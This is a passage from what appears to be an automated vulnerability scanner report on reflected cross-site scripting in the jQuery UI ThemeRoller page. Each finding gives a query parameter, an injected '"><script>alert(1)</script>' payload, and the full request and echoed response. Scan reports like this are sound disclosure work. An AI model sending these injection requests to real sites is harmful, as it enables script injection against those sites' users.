Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100f3cd4"><script>alert(1)</script>c1869e1c15c&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefau
...[SNIP]...

4.132. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12788"><script>alert(1)</script>4cac5b3259f was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=10012788"><script>alert(1)</script>4cac5b3259f&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bg
...[SNIP]...

4.133. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3652"><script>alert(1)</script>712a67946a6 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ht=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18f3652"><script>alert(1)</script>712a67946a6&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow
...[SNIP]...

4.134. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5736"><script>alert(1)</script>7a42dd72740 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
eroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35c5736"><script>alert(1)</script>7a42dd72740&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColo
...[SNIP]...

4.135. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef96f"><script>alert(1)</script>5a4c88ddb1b was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75ef96f"><script>alert(1)</script>5a4c88ddb1b&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColor
...[SNIP]...

4.136. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4287e"><script>alert(1)</script>b19fe4c69d3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgC
...[SNIP]...

4.137. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8c3"><script>alert(1)</script>e7f1ed5ee7 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="t
...[SNIP]...

4.138. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c572"><script>alert(1)</script>d20b36ec1c was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.139. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1af"><script>alert(1)</script>073f89d073f was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed
...[SNIP]...

4.140. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd035"><script>alert(1)</script>66642ae8c0e was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
